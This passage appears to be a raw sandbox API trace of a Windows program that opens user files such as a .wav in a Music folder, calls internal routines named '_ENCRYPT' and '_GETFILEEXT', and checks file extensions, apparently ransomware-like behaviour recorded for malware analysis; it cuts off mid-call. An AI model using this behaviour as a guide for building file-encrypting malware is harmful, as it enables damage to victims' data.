HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.004] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\v6hgg6br4l.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8edfa0 [0188.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x8edfa0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav") returned 69 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.007] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0188.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.009] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0188.009] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.010] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0188.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.011] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0188.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.011] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0188.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.012] CloseHandle (hObject=0x158) returned 1 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.012] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.013] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.013] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.013] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.013] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.013] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.013] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.013] CompareStringW (Locale=0x400, 